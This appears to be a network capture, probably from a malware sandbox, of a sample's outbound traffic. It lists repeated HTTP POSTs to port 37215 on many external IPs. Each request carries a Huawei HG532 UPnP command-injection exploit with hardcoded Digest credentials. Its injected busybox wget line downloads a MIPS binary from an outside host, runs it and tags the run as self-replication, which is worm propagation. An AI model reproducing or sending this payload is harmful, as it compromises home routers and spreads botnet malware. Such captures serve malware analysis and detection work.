                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1585192.168.2.1335782157.92.117.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586688995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1586192.168.2.1360828197.120.213.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586703062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1587192.168.2.134827641.38.62.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586730957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1588192.168.2.1354540197.171.223.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586739063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1589192.168.2.1334904197.37.70.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586766005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1590192.168.2.1333906197.136.255.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586783886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1591192.168.2.134177841.122.197.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586817026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1592192.168.2.1356906197.17.246.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586826086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1593192.168.2.1354902197.149.26.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586843014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1594192.168.2.1347538197.50.73.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586867094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 